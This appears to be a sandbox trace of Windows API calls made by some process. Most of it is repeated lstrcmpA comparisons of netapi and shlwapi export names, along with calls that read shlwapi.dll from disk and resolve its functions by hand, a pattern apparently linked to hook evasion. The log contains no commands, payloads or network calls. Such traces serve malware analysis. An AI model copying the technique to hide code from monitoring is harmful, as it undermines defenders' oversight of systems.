1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0103.865] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0103.866] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0103.867] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0103.870] GetProcessHeap () returned 0x5b0000 [0103.870] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d25030 | out: hHeap=0x5b0000) returned 1 [0103.870] GetProcessHeap () returned 0x5b0000 [0103.870] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c9320 [0103.870] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0103.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0103.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0103.871] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0103.871] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0103.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0103.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0103.871] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0103.871] GetProcessHeap () returned 0x5b0000 [0103.871] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x51148) returned 0x2d25030 [0103.872] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0104.117] ReadFile (in: hFile=0x17c, lpBuffer=0x2d25030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d25030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0104.121] CloseHandle (hObject=0x17c) returned 1 [0104.121] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0104.121] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0104.121] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0104.121] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0104.121] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0104.121] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0104.121] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0104.121] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0104.121] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0104.121] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0104.121] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0104.121] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0104.121] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0104.121] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0104.121] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0104.121] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0104.122] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0104.122] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0104.122] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0104.122] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0104.123] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0104.123] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0104.124] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0104.124] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0104.124] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0104.124] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0104.124] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0104.124] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0104.125] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0104.125] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0104.125] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0104.125] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0104.125] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0104.125] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0104.125] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0104.125] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0104.125] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0104.126] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0104.126] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0104.126] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0104.127] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0104.127] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0104.127] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0104.127] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0104.127] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 